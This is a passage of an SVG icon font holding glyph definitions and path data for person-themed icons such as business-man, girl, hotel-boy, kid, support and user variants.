m-19 100c1 2 2 4 5 5 2-10 4-20 5-30 0-7 3-10 10-12 11-2 11-2 10 8-1 15 1 30 1 45 1 13 1 27 1 41-1 38 6 75 15 111 2 10 8 17 15 21-3-7-5-15-6-23 6 5 10 10 13 15 6 7 13 10 21 11 14 1 29-1 42 3 8 2 15 3 22 7 13 7 27 4 41 6 4 0 3-3 3-5 1-8-2-15-6-22-3-7-7-13-11-19 21 8 40 19 55 36 5-7 5-14 3-22-2-7-6-13-10-21 11 3 21 8 30 13 13 8 24 17 35 28 2 2 4 2 6-1 5-8 8-16 7-26 0-1-1-4 2-5 2-1 3 1 5 3 5 6 10 13 14 20 1 1 1 2 2 3 4-11 8-22 2-34 0-1-2-2-1-4 1-1 3-1 5-1 4 1 9 3 13 4 2 1 4 2 6 3 3-11-3-20-24-37 13-1 25 1 36 10-2-14-3-26-3-38-1-8-1-15 1-23 8-32 9-64 6-96l0-4c-2-11-2-11 10-11 9 1 9 1 11 10 2 9 4 18 7 28 3-9 4-17 3-25 0-3-1-6-2-9-4-11-8-23-12-33-4-9-10-16-21-14-4 1-4-2-4-4-7-27-17-52-30-75-22-40-54-68-98-82-36-10-69-4-102 13-29 15-50 38-66 66-14 25-25 51-31 78-1 3-1 5-5 4-9-2-16 3-19 10-6 14-13 28-16 44-2 10-1 20 4 30z" />
<glyph glyph-name="business-man-alt-3" horiz-adv-x="1000" unicode="&#xecee;" d="M293 466c2-16 9-31 16-45 4-10 11-17 21-19 4-1 4-4 4-7 4-20 10-39 21-56 14-24 33-44 56-59 17-12 33-24 52-31 8-3 16-4 24-7h28c7 3 15 3 23 6 19 6 36 19 52 30 25 17 46 37 61 63 8 14 13 29 14 45 1 2 1 4 1 6 0 6 3 9 9 12 12 5 17 17 21 29 4 11 10 22 12 34v16c-1 6-2 11-4 16-3 9-8 16-17 21-3 1-2 3-3 6 0 15 3 30 4 45 5 40-1 78-18 115-4 10-10 19-11 29 0 3-2 4-5 5-7 0-11 5-14 11-1 3-2 5 1 7 3 2 1 3-1 4-7 2-13 2-19 1-4-1-5 0-5 3-1 6-3 11-5 17-1 2-2 3-6 3-11-3-21-2-32 2-6 3-9 8-11 14-4 11-11 19-23 20-3 0-4 2-3 5 0 6 0 13 0 20-7-3-11-7-16-9-8-2-10-1-10 7-1 9 2 17 6 25-17-2-27-10-33-25-4 9 1 15 4 23-15-5-26-14-36-26-6-7-11-14-16-21-2-2-2-4-5-4-2 0-2 3-3 5-1 2-1 4-2 7-5-2-7-6-9-10-5-8-8-16-12-25-5-10-9-10-18-4 0 1-1 1-1 2-7 6-7 6-13-1-11-12-19-27-27-42-4-8-9-15-16-22-6-5-12-11-18-16 3-3 6-2 9-2 6-1 7-3 5-8-5-11-11-22-16-32-1-2-2-4-3-6 3 0 4 2 6 2 2 0 4 1 5 0 1-2 0-3 0-5-6-14-11-28-16-42 1-1 2 0 3 0 8 3 8 3 8-5-2-24-2-47-1-70 1-2 0-4-1-5-17-14-20-32-17-52z m21 32l1 0c2-8 3-16 5-24 1-6 10-11 15-9 3 1 2 3 1 5-1 14-1 27-1 40-1 20 3 40 7 59 6 27 11 54 19 80 3 6 5 13 8 19 7 16 20 22 36 23 16 1 32-1 47-5 20-5 39-4 59 2 16 5 32 7 49 7 19 0 32-8 42-22 12-16 19-34 26-52 5-14 10-29 18-42 1-2 1-4 3-5 11-12 12-26 13-41 1-18 1-37 0-56 0-3-1-6 4-6 4 1 9-2 10 5 0 8 1 15 2 23 1 2 0 4 2 5 2 0 3-2 4-3 7-10 9-21 7-31-2-16-9-29-16-43-3-7-8-12-17-10-4 1-4-2-4-3-2-8-4-16-4-24-2-22-11-40-24-57-24-30-55-53-90-68-29-12-59-10-87 8-18 12-36 24-52 39-26 24-42 54-48 89 0 2-1 5-1 8-1 5-2 10-10 8-5-1-10 2-12 6-8 18-18 35-18 55 0 7 2 14 6 20z m585-455c-2 40-13 74-51 94-11 5-22 11-33 16-44 18-88 35-132 52-21 9-23 8-28-14-28-104-56-209-84-313-1-5-2-11-6-17-2 5-3 8-3 12-6 52-13 104-18 156-5 45-18 90 1 135 4 7-2 8-8 8-23 0-46-1-69 0-12 0-16-2-12-15 9-24 12-49 7-75-5-21-6-43-9-64-6-52-12-104-19-156h-3c-1 2-2 4-2 7-29 106-57 213-86 320-6 23-8 24-31 15-43-17-86-34-129-51-19-8-38-18-54-32-15-14-26-30-27-51-6-57-12-114-17-171-3-34 12-49 46-49 97 0 194 0 290 0 150 0 299 0 448 0 30 0 47 19 44 46-6 49-12 98-15 147z" />
<glyph glyph-name="business-man" horiz-adv-x="1000" unicode="&#xecef;" d="M926-99c-5 58-12 117-17 175-2 22-13 39-29 53-16 14-35 25-55 33-44 18-89 35-133 53-23 9-26 7-32-16-29-110-58-220-88-330 0-2-1-5-2-7h-3l-20 161c-3 22-4 44-9 65-5 27-2 53 7 78 5 13 0 15-12 15-11 0-22 0-33 0-11 0-22 0-32 0-13 0-18-2-13-15 9-25 12-51 7-78-4-21-6-43-9-65l-20-161h-3c0 2-1 5-2 7-29 110-59 220-88 330-6 23-9 25-32 16-44-18-88-35-133-53-20-8-39-19-55-33-16-14-27-31-29-53-5-58-12-117-17-175-3-35 13-51 48-51 99 0 199 0 298 0h160c99 0 199 0 298 0 35 0 51 16 48 51z m-613 504c20-40 43-78 77-108 41-36 88-50 143-40 36 7 65 27 90 53 34 35 56 77 76 120 2 4 3 8 6 10 15 14 23 31 29 50 5 18 7 36 1 55-4 9-9 17-20 17-6 1-6 3-5 8 4 28 7 56 6 84 0 34-5 68-23 98-30 52-78 79-135 92-11 3-23 4-34 6h-48c-3-2-6-2-8-2-36-4-69-14-100-33-42-26-70-63-79-112-6-29-6-59-4-89 1-15 3-30 5-45 0-2 2-6-2-6-20-2-25-17-26-32-3-30 5-57 23-80 12-14 19-30 28-46z m-22 123c0 4 2 8 4 12 6 11 16 12 24 1 3-4 6-10 9-15 2-5 4-11 8-16-3 15-6 30-9 45-4 24-7 47-6 71 0 7 1 13 4 18 15 28 34 52 65 63 12 5 21 4 30-6 47-47 105-71 170-82 26-4 53-7 80-7 8-1 10-3 9-11-3-28-8-56-14-83l-1-7c6 10 10 21 17 30 8 12 18 11 25-2 1-4 3-7 3-11 0-25-6-48-25-67-5-4-8-9-11-15-11-26-23-52-38-77-4-8-10-16-15-24-55-82-186-84-243 4-20 31-36 64-51 97-2 6-5 11-9 15-20 18-26 41-26 67z" />
<glyph glyph-name="female" horiz-adv-x="1000" unicode="&#xecf0;" d="M712 334c-1 8-3 16-5 24-12 64-26 128-38 192-7 39-45 73-84 73-56 1-112 1-168 0-5 0-11 0-16-1-41-12-64-39-72-82-12-68-27-135-40-203-5-23 7-43 27-47 21-4 39 8 44 31l38 185c1 4 3 7 4 11l4-2c0-4 1-8 0-12-5-25-10-51-15-76-17-82-33-164-50-245-3-15 1-19 16-19h49v-14c0-63 0-127 0-191 0-28 18-45 45-45 20 0 41 18 41 45-1 64-1 128-1 192v12h17v-13c0-64 0-129 0-193 0-23 14-40 35-43 31-4 51 14 51 46 0 63 0 127 0 190v14h48c18 0 21 3 18 22-18 88-36 176-54 264-4 20-8 39-12 59 0 2 2 5 3 8 2-2 3-4 5-6 0-1 0-3 1-5 12-62 25-124 38-186 4-21 23-34 42-30 21 4 33 24 29 45z m-211 300c41 1 75 35 74 77 0 43-33 76-75 77-42 0-75-34-75-77 0-42 34-77 76-77z" />
<glyph glyph-name="funky-man" horiz-adv-x="1000" unicode="&#xecf1;" d="M915 18c-3 8-4 17-8 25-13 25-33 43-55 60-57 43-121 70-189 92-4 1-8 0-11-3-11-7-21-15-33-21-52-30-107-41-166-28-37 8-71 25-101 48-6 5-11 5-18 3-45-15-89-33-130-56-35-19-67-41-93-71-17-19-26-40-26-66 1-51 0-101 0-151h169c218 0 435 0 653 0 8 0 9 2 9 9-1 53-1 106-1 159z m-793-140c-6-1-9 1-9 8 0 41-1 82 0 123 0 16 7 29 20 42v-125c0-14-1-27 0-40 0-10-6-8-11-8z m53-1c-16 1-14-2-14 14 0 58 0 116-1 174l11 20c3 2 7 5 13 9v-52c0-52-1-104 0-156 0-7-3-9-9-9z m50 2c-6 0-15-4-15 9 1 62 1 123 1 185 0 9 0 18-1 27-1 9 2 14 11 17 4 2 7 5 13 6v-72c0-54 0-108 0-162 0-7 0-12-9-10z m60 179v-45c0-42 0-84 0-126 0-12-8-8-14-8-6-1-10 0-10 8 1 80 1 160 1 241 0 8 12 19 20 18 5-1 3-5 3-7 0-27 0-54 0-81z m50-8v-29h0c0-45 0-89 0-134 0-7-1-11-9-9-6 1-15-5-15 9 1 87 1 175 1 263 0 6 16 17 21 14 4-2 2-6 2-8 0-35 0-71 0-106z m51-161c0-9-2-12-11-11-8 0-13 0-13 11 1 42 0 84 0 125v126c0 11 0 10 10 6 11-5 14-12 14-24 0-78 0-156 0-233z m48-11c-7-1-13-1-19 1-3 1-2 4-2 6v118h0c0 37 0 75 0 112 0 9 2 11 11 8 10-2 13-7 13-18-1-72 0-144 0-217 0-3 2-8-3-10z m53 10c0-6-1-10-9-10-15 0-14-1-14 14v104c0 36 0 72-1 108 0 8 3 9 10 8 14-1 14-1 14-15l0-209z m50 107c0-36 0-72 0-108 0-6-1-10-9-9-6 1-14-3-14 9 0 72 0 143 0 214 0 3-1 8 3 10 6 2 12 3 18 1 4-1 2-6 2-9 0-36 0-72 0-108z m51 7c0-39 0-77 0-115 0-9-4-10-11-9-7 0-12-1-12 9 0 75 0 149 0 224 0 7 15 17 21 14 4-2 2-6 2-9 0-38 0-76 0-114z m50 39v-27h1v-125c0-12-1-11-14-11-10-1-10 4-10 11 0 80 0 160 0 240 0 7 14 20 21 19 4 0 2-4 2-7 1-33 0-67 0-100z m51-154c0-6-1-10-9-9-6 1-15-4-15 9 1 45 0 90 0 135v132c0 11 0 11 11 8 11-2 13-8 13-19 0-85 0-170 0-256z m48-9c-6-2-13-2-19 0-4 2-2 7-2 10 0 41 0 82 0 124v124c0 11 0 10 10 7 11-4 14-10 14-21-1-78 0-155-1-233 1-4 3-9-2-11z m51 0c-7-2-13-2-20 0-2 1-1 5-1 7v228c0 11 0 10 9 6 11-4 15-11 15-24-1-69 0-138 0-207-1-3 1-9-3-10z m53 9c0-14-9-8-15-9-6-1-9 1-9 8 0 67 0 135 0 203 0 1 1 2 1 5 7-6 13-10 19-14 4-3 4-6 4-10 0-61-1-122 0-183z m38-9c-5 0-11-2-11 7 0 54 0 108 0 161 0 1 1 2 1 4 12-13 19-27 19-44 0-41 0-81 0-121 0-7-3-8-9-7z m-620 615c-15-10-24-24-25-41-3-47 16-84 56-110 3-2 5-5 6-9 19-54 54-95 103-125 51-30 105-39 162-18 68 24 116 71 141 140 2 4 3 9 8 12 34 20 51 51 56 89 3 26-3 49-28 64-3 2-3 4-3 7 1 25 1 50-4 77 10-7 14-17 21-25 1 3 2 4 3 6 30 70 7 154-55 199-17 13-36 22-59 22-7 0-15-6-19-4-6 2-7 11-12 17-30 39-70 57-118 56-37 0-71-8-105-22-50-19-95-47-126-92-17-24-26-50-25-81 15 8 28 19 47 13-22-15-36-33-41-59-6-24-4-48 3-73 5 10 10 19 19 25 1-2 1-3 1-5-1-18-2-36 0-54 0-5-3-7-6-9z m26-18c8 2 9 6 8 13-3 29-3 57 2 86 1 5 3 7 7 9 21 8 42 14 64 19 6 1 8-1 8-6 3-14-1-26-8-37-4-7-2-9 5-9 39-4 74 8 107 26 15 8 29 17 43 25 10 6 13 5 14-6 2-16-8-26-18-36-3-3-7-5-9-10 23-4 46-2 68 4 17 5 32 12 45 24 7 6 12 13 15 22 1 5 4 6 8 4 11-5 18-12 23-22 10-19 14-40 18-61 1-3 2-6 3-11 6 12 12 21 19 33 3-10 3-18 2-26 0-10-1-21-2-32-1-5 0-7 5-8 24-8 31-19 27-44-3-24-15-44-33-61-2-2-6-5-10-6-13-1-14-11-17-20-27-74-79-120-156-137-1 0-3 0-5 0 5 3 10 6 14 9 6 4 11 10 11 17 2 12-3 18-15 16-17-3-34-2-52 0-12 2-18-5-15-18 3-13 14-17 24-24-23 1-45 8-65 20-50 28-85 69-101 125-2 6-5 9-11 11-17 4-26 18-34 32-9 14-14 29-14 47 1 17 8 28 25 32z m139-175c22-1 45-3 65 10 13 7 15 7 27 0 2-2 5-3 8-4 13-5 27-7 41-6 5 0 9 0 14 0 8 0 9 3 7 10-3 10-10 17-19 22-14 9-30 12-47 13-28 3-55 1-80-13-10-5-18-12-20-24-1-3-2-7 4-8z" />
<glyph glyph-name="girl-alt" horiz-adv-x="1000" unicode="&#xecf2;" d="M999-129c1 46-1 92-8 138-10 62-38 110-99 133-2 1-5 2-7 3-44 20-90 33-136 46-27 8-54 16-82 24 0-1 0-2 0-3l1-7c2-30 4-61-8-89-32-77-80-143-149-192-8-6-14-6-22 0-69 49-116 115-149 192-6 14-8 30-9 46 0 18 0 36 2 53-1 0-2 0-3 0-54-16-107-32-160-49-39-12-77-28-111-53-13-11-23-23-30-39-10-25-18-51-22-78-2-17-4-35-6-52 0-28 0-56 0-84-1-8 1-10 9-10 330 0 660 0 989 0 0 7 0 14 0 21z m-740 459c33-1 66 1 99 3 20 1 39 2 59 5 0 3-2 4-3 6-44 52-64 113-69 180-1 6 1 8 7 9 9 0 17 2 24 4 73 23 130 64 164 136 3-10 7-19 11-28 20-40 52-65 96-76 7-1 9-4 9-11-1-17 0-33-2-49-7-62-27-118-68-165-1-2-3-3-2-6 11-1 22-3 33-4 43-2 86-5 130-3 6 0 9 2 11 8 17 34 27 71 30 109 8 77-5 152-35 223-28 66-72 120-134 158-29 18-60 24-94 14-4-1-8 0-12 1-37 10-74 8-110-7-56-24-98-64-129-115-41-67-61-140-64-218-2-55 6-109 29-160 4-10 10-14 20-14z m289-127c-18-17-39-21-62-17-13 2-25 8-34 17-5 6-13 6-18 1-5-5-5-12 0-18 1-2 3-3 5-5 17-16 38-22 61-22 4 0 9 0 13 1 21 3 39 10 53 26 5 6 5 13 0 18-5 5-13 5-18-1z" />
<glyph glyph-name="girl" horiz-adv-x="1000" unicode="&#xecf3;" d="M997-129c0 46-1 91-8 137-10 62-38 109-99 133-2 1-4 2-7 3-43 20-90 32-136 46-26 8-53 16-80 24-1-2-1-3-1-4l1-7c3-30 4-60-8-89-32-76-79-141-148-190-8-6-14-6-22 0-69 49-116 114-148 191-6 14-9 30-9 46-1 18 0 35 2 53-2 0-3 0-4-1-53-16-106-31-159-48-39-12-77-28-110-53-13-11-24-23-30-39-10-25-18-51-22-77-2-18-4-35-6-53 0-27 0-55 0-83-1-8 1-10 9-10 328 0 657 0 985 0 0 7 0 14 0 21z m-634 476c16-9 33-18 53-23-102 94-92 253-60 316 3-2 4-5 6-8 53-78 128-120 222-129 34-3 68 1 100 10 8 2 10-1 9-8-1-8-2-16-3-24-9-60-32-113-78-156 4-1 5 0 8 1 38 15 73 37 102 66 97 95 105 246 20 351-54 66-125 101-210 106-86 6-162-20-223-80-80-80-103-175-65-282 21-61 64-107 119-140z" />
<glyph glyph-name="group" horiz-adv-x="1000" unicode="&#xecf4;" d="M753 430c50 0 90 40 90 89 0 50-40 90-90 90-49 0-89-40-89-90 0-49 40-89 89-89z m-506 0c49 0 89 40 89 89 0 50-40 90-89 90-49 0-90-40-90-90 1-49 41-89 90-89z m253 93c73 0 132 59 132 132 0 73-59 133-132 133-73 0-132-60-132-133 0-73 59-132 132-132z m253-128c-14 0-27-2-40-6 17-33 27-69 27-108v-286h156v258c0 79-64 142-143 142z m-649-142v-258h156v286c0 39 11 75 27 108-13 4-26 6-40 6-79 0-143-63-143-142z m396 235c-114 0-207-93-207-207v-369h414v369c0 114-93 207-207 207z" />
<glyph glyph-name="hotel-boy-alt" horiz-adv-x="1000" unicode="&#xecf5;" d="M305 682c14 6 28 11 43 16 79 25 159 34 241 19 42-7 82-18 121-34 8-3 9-2 9 7-1 13 0 27 0 40 0 13 0 26 0 40-1 23-13 40-35 48-15 6-32 11-48 15-102 28-203 20-302-14-22-8-36-25-36-47 0-28 0-56 0-84 0-6 1-8 7-6z m16-281c5-2 7-5 9-10 16-46 46-82 88-106 45-26 91-33 140-15 57 21 97 61 119 119 1 4 2 8 6 10 27 16 42 40 47 70 4 23 2 45-20 60-3 3-3 6-2 9 2 9 3 17 5 26l0 1c1 9 2 17 3 26 0 1 0 1 0 2 2 24 4 56 1 72-38 11-74 25-113 32-87 15-172 6-255-21-15-5-37-10-52-16l0-1c-6-39-4-79 3-118 1-6 0-10-6-14-8-5-13-14-15-23-11-34 10-86 42-103z m1 113c5 1 6 3 5 8-1 37 3 72 28 101 2 2 4 4 6 6 16 14 19 14 37 2 28-19 56-38 88-50 35-13 70-17 107-15 28 1 56 5 83 14 5 1 5-2 6-5 1-18 0-36-2-53 0-3-1-6 4-7 24-4 26-21 24-39-3-21-13-38-29-52-2-2-5-4-8-4-11-1-12-9-15-17-23-65-68-105-136-118-5-1-11-1-19-2-52 3-93 29-125 70-14 17-23 37-29 58 0 2 0 6-5 6-12 2-20 11-27 21-10 14-18 29-17 47 1 17 7 25 24 29z m606-477c-1 26-12 48-32 64-10 9-21 15-33 20-30 14-63 22-95 31-36 9-73 18-106 36-6 3-8 6-8 13 1 16 0 32 0 48-3 0-5-2-6-3-23-20-48-36-76-45-15-5-21-12-20-28 1-25-20-46-45-49-25-3-49 12-56 37-3 9-2 18-2 26 0 4-1 7-5 8-36 11-67 29-97 56 0-13-2-23 0-32 5-24-7-33-27-40-36-15-74-24-112-34-31-8-61-17-88-33-32-18-48-46-47-83 0-19 0-38 0-57-1-10 3-18 11-25 12-10 26-18 40-24 90-41 186-59 283-69 69-6 138-5 207 2 81 9 160 25 236 55 23 9 46 19 65 35 7 6 13 12 13 22 0 23 1 46 0 69z m-424-120c-20 0-36 16-36 36s16 36 36 36c20 0 36-16 36-36s-16-36-36-36z m0 97c-20 0-36 17-36 36s16 36 36 36c20 0 36-16 36-36s-16-36-36-36z m81 453c19-1 35 14 35 33 0 19-14 34-33 34-19 1-35-14-35-33 0-19 15-34 33-34z m-170 0c18 0 33 15 34 33 0 19-15 34-34 34-18 1-33-14-34-32-1-19 15-35 34-35z m28-99c-1-2 0-5 1-7 15-17 33-30 57-31 22 1 38 13 53 28 2 3 6 6 4 10-3 5-8 2-11 1-19-5-38-7-58-5-13 1-26 3-38 6-3 1-6 1-8-2z" />
<glyph glyph-name="hotel-boy" horiz-adv-x="1000" unicode="&#xecf6;" d="M319 408c4-2 7-5 8-9 17-48 47-83 90-109 45-26 92-32 141-14 58 21 98 62 121 120 1 4 2 8 6 10 27 16 43 41 48 71 4 24 1 46-20 61-4 3-3 6-3 9 4 18 6 36 8 54 0 4 2 7 5 9 19 11 33 28 45 45 4 6 4 9-1 13-13 11-27 21-42 31 16 6 30 8 47 8-31 36-71 53-115 65 7 7 14 11 22 14 7 4 16 4 25 6-62 32-126 39-193 20 6 16 17 27 29 38-2 0-2 0-3 0-52-9-101-24-139-63-4-4-6-4-7 2-2 10-1 20 4 29-20-4-44-19-59-39-26-32-37-70-42-110-6-40-4-79 3-119 1-6 0-10-6-14-8-6-13-14-16-24-11-34 11-86 44-104z m0 115c5 1 6 3 6 8-2 37 3 73 28 102 2 2 4 4 6 6 17 14 19 15 37 2 29-19 57-38 90-51 35-13 71-17 108-15 28 2 57 5 84 14 5 2 5-1 6-5 1-18 0-36-1-53-1-4-2-7 3-8 24-4 27-20 24-39-2-21-13-38-29-52-2-2-5-5-8-5-11-1-12-9-15-17-23-66-69-106-137-120-6-1-12-1-20-1-53 3-94 29-127 71-14 17-23 37-29 58 0 3 0 6-5 7-12 2-21 10-28 20-10 14-17 30-17 48 1 17 7 25 24 30z m614-483c-1 26-11 48-32 65-10 8-21 14-33 20-31 14-64 22-97 30-37 10-73 19-107 37-6 3-8 7-8 14 0 16 0 32 0 48-4 0-5-2-7-3-22-21-48-36-76-46-16-5-21-11-21-28 1-26-20-46-46-50-25-3-49 13-56 38-3 9-2 18-2 27 0 4-1 6-5 7-36 12-68 30-99 57 0-13-1-23 1-33 5-23-8-33-27-40-38-15-76-24-114-34-31-9-62-17-89-34-32-18-49-46-48-84 0-19 0-38 0-57-1-11 4-19 12-26 12-10 26-18 40-24 91-42 188-60 287-70 70-6 139-5 209 2 82 9 162 25 239 56 24 9 46 19 66 35 7 5 14 12 14 22-1 24 0 47-1 71z m-433-121c-20 0-36 16-36 36s16 37 36 37c20 0 36-17 36-37s-16-36-36-36z m0 98c-20 0-36 16-36 36 0 20 16 36 36 36 20 0 36-16 36-36 0-20-16-36-36-36z m86 458c19-1 35 15 35 33 1 20-14 35-33 35-19 1-35-14-35-33-1-19 14-35 33-35z m-173 0c19 0 34 15 35 33 0 19-15 35-34 35-19 1-34-14-35-33 0-19 15-35 34-35z m29-100c-1-2 0-5 1-7 16-17 33-31 57-32 23 1 39 13 54 29 3 3 6 6 4 10-3 5-7 2-11 1-19-5-39-7-59-6-13 1-26 4-38 7-3 1-6 1-8-2z" />
<glyph glyph-name="kid" horiz-adv-x="1000" unicode="&#xecf7;" d="M666 165c-13 0-52 0-60 0h-2c-6 0-12-4-15-9l-1-1 0 0c-7-12-65-113-88-114-23 1-81 102-88 114l0 0c-1 1-1 1-1 1-3 5-9 9-15 9h-2c-8 0-47 0-60 0-58 0-136-54-136-123v-110h604v110c0 69-78 123-136 123z m271 124c0 0 0 0 0 0-21 92 26 206-47 297-65 82-121-4-137 1-17 41-44 79-76 109-51 46-113 72-177 72-64 0-126-26-177-72-32-30-58-68-76-109-16-5-72 81-137-1-73-91-26-205-47-297 0 0 0 0 0 0 0-2 0-4 0-5 0-11 8-20 18-21l2 0h0c110-6 157 47 170 86l1-1c24-42 58-80 98-108 46-33 97-51 148-52h0c51 1 102 19 149 52 39 28 74 66 97 108l1 1c13-39 60-92 170-86h0c1 0 1 0 2 0h0c10 1 19 10 19 21 0 1-1 3-1 5z m-197 97c-1 0-2 0-3 1l-13 1-6-12c-36-71-119-147-218-150-99 3-182 79-218 150l-6 12-13-1c-1-1-2-1-3-1-28 0-43 20-43 58 0 13 3 56 35 65 0 0 129-3 227 27 21 7 28 4 46-1 98-28 223-26 223-26 32-9 35-52 35-65 0-38-15-58-43-58z" />
<glyph glyph-name="man-in-glasses" horiz-adv-x="1000" unicode="&#xecf8;" d="M926 56c-2 43-14 79-54 100-12 6-23 12-36 17-46 19-94 38-141 56-22 9-24 8-30-15-29-111-59-223-89-334-1-6-2-12-7-18-1 5-2 8-3 12-6 56-14 112-19 167-5 48-19 96 2 144 3 8-3 8-9 8-25 0-49 0-74 0-13 1-18-2-12-16 9-26 12-52 6-80-4-22-6-45-9-68l-20-166h-3c-1 2-2 4-3 7-30 114-61 228-91 342-7 24-9 26-33 16-46-18-92-36-138-54-21-9-40-20-57-35-17-14-28-31-30-54-6-61-12-122-18-182-3-37 13-53 50-53 103 0 206 0 309 0 160 0 319 0 478 0 32 0 50 20 47 50-6 52-13 104-16 156z m-629 402c11-3 14-9 18-17 21-52 48-100 92-136 33-27 70-41 114-34 31 4 57 19 80 40 40 38 67 84 87 135 1 3 1 10 6 10 18 0 25 14 36 24 19 15 19 35 16 56-2 10-7 15-18 14-8-1-9 2-7 10 6 27 8 56 10 87-1 7-1 17-2 28-4 22-10 42-31 54-5 2-6 6-9 10-21 40-50 72-92 91-26 12-55 18-84 20-77 4-141-20-183-89-3-5-7-6-12-8-17-7-29-19-37-36-11-21-16-43-17-67-2-31 3-61 9-92 1-5 2-8-6-8-6 0-10-5-12-10-10-31 11-74 42-82z m48 67c0 10 1 19 11 23 5 2 10 4 13-2 4-5 9-5 15-5 7 1 9-1 8-9-1-13 8-22 20-22 12 1 19 11 17 24-1 6 1 7 6 7 6 0 12-1 18 3 3 2 4-1 6-3 11-13 11-31-1-44-21-22-48-30-79-25-17 4-30 22-33 46 0 3 0 5-1 7z m288-112c-18-33-39-63-69-85-45-33-92-31-136 6-36 31-59 72-78 116 0 0 0 2 0 4 31-14 62-11 92 2 27 13 48 32 48 65 0 8 5 6 10 6 4 0 10 2 11-6 8-46 43-75 92-76 8 0 17 0 25 1 8 2 15 6 24 8-5-16-12-28-19-41z m-26 57c-20 1-39 6-56 19-10 8-17 17-17 31 0 8 3 14 8 21 2 3 4 3 8 3 13-2 23-4 23-22 0-9 13-13 22-11 10 3 16 11 13 20-2 11 3 11 10 10 4 0 9 0 12 3 10 8 20 5 25-7 9-28-18-67-48-67z m-253 220c4 3 5 4 8 0 42-52 100-66 162-69 26-1 51 1 76 9 13 3 18 10 14 18-4 11-12 9-21 7-47-13-94-11-140 4-1 0-3 2-5 2 25-4 48-6 72-5 42 1 80 13 113 39 9 7 12 4 16-4 13-21 19-45 22-70 3-22 4-44 3-70-15 23-36 20-57 20l-64 0c-13 0-23-6-29-17-4-5-8-7-14-6-4 0-7 0-11 0-12-2-20 1-27 12-5 8-14 11-24 11-26 0-53 0-79 0-23 0-27-2-42-17-16 41-3 107 27 136z" />
<glyph glyph-name="people" horiz-adv-x="1000" unicode="&#xecf9;" d="M713 249c0 63 0 126-1 188 0 38-24 63-62 63-100 1-200 1-300 0-38 0-62-25-62-63-1-66-1-132 0-198 0-39 24-63 63-65 11-1 23 0 38 0 0-58-1-113 0-167 1-48 24-71 72-72 23-1 45-1 68 0 61 0 82 21 82 82 0 51 0 102 0 154 12 1 20 2 27 2 53 2 75 24 75 76z m-463-44c-5 88-2 176-2 269-41 0-90 2-139 0-30-2-45-24-46-54-1-53-1-107 0-160 1-34 19-52 52-57 10-1 20-2 30-3 1-5 3-8 3-11 1-36 1-71 1-106 0-66 14-78 80-81 103-4 113 22 105 115-44 14-82 40-84 88z m687 217c0 25-13 48-38 50-50 4-101 1-150 1 3-24 6-44 7-64 0-55 0-109 0-164 0-75-17-100-89-130-8-101 3-112 102-112h3c66 0 79 14 79 81v116c16 2 27 2 39 4 29 5 46 23 47 54 1 54 1 109 0 164z m-436 120c61 0 109 48 110 110 0 63-49 114-111 114s-112-52-111-115c1-62 50-109 112-109z m-258-32c51 0 93 43 92 94 0 51-43 94-94 93-52 0-92-42-92-94 1-52 43-94 94-93z m516 0c52 0 92 42 92 94s-42 94-93 93c-51-1-94-44-93-94 0-51 44-94 94-93z" />
<glyph glyph-name="support" horiz-adv-x="1000" unicode="&#xecfa;" d="M332 94l-130-60c-19-8-39-21-47-41 0 0-15-34-32-81h351l21 135-101 99-62-52z m514-101c-8 21-28 33-48 41l-129 60-63 52-100-99 20-135h351c-16 47-31 81-31 81z m-662 334h37c18 0 32 14 32 32v124c0 14-9 26-22 30 15 137 111 217 267 222h5c156-5 251-85 267-222-13-4-22-16-22-30v-124c0-18 14-32 32-32h37c18 0 32 14 32 32v124c0 15-11 28-26 31-7 76-36 140-84 187-51 50-124 79-211 86 0 0-9 1-27 1-19 0-28-1-28-1-87-7-160-36-211-86-48-47-77-111-84-187-15-3-26-16-26-31v-124c0-17 14-32 32-32z m550 143c2 144-67 230-234 230-167 0-235-86-234-230 3-208 102-331 234-331s232 123 234 331z" />
<glyph glyph-name="user-alt-1" horiz-adv-x="1000" unicode="&#xecfb;" d="M400 0c0 37 0 74 0 111 0 4-1 7-5 9-30 20-61 41-91 61-3 2-4 4-5 7-9 73-18 146-27 219-2 13-3 26-5 39 0 3 1 4 4 5 33 8 66 15 100 20 40 7 80 12 121 12 29 1 58-1 86-5 51-6 101-15 151-27 4-1 5-2 4-5-5-41-10-83-15-124-6-44-12-88-17-132 0-5-2-8-7-11-30-20-60-40-90-60-3-2-4-4-4-7 0-75 0-149 0-223 0-5-1-7-4-9-24-13-49-24-76-28-23-4-45-1-67 6-17 6-33 13-49 23-3 1-4 4-4 7 0 37 0 75 0 112z m-67 683c0 93 75 167 167 167 92 0 167-75 167-167 0-92-75-166-167-166-92 0-167 74-167 166z" />
<glyph glyph-name="user-alt-2" horiz-adv-x="1000" unicode="&#xecfc;" d="M524-150c-106 0-192 21-273 66-94 54-125 120-105 235 20 125 84 223 185 298 15 12 24 10 36-3 37-40 75-79 111-119 12-14 19-16 32 1 31 39 65 77 97 117 10 13 18 17 34 7 123-78 192-189 215-332 23-145-69-200-171-240-56-22-115-31-161-30z m-33 609c-105 0-194 91-194 197 1 104 88 192 193 194 106 2 198-87 199-192 0-110-87-198-198-199z" />
<glyph glyph-name="user-alt-3" horiz-adv-x="1000" unicode="&#xecfd;" d="M499-122c-160 0-319 1-478 0-17 0-19 6-20 20-8 101 52 156 131 199 50 27 106 43 158 65 21 9 42 18 60 32 23 18 28 39 13 64-12 19-26 37-39 56-65 98-89 204-61 319 27 116 125 193 244 189 100-3 174-52 214-144 53-125 30-244-40-357-11-19-26-36-38-54-23-33-18-58 17-80 40-25 84-39 128-55 61-22 119-50 166-98 41-41 49-92 45-147-1-12-9-9-15-9-57 0-114 0-171 0-105 0-209 0-314 0v0z" />
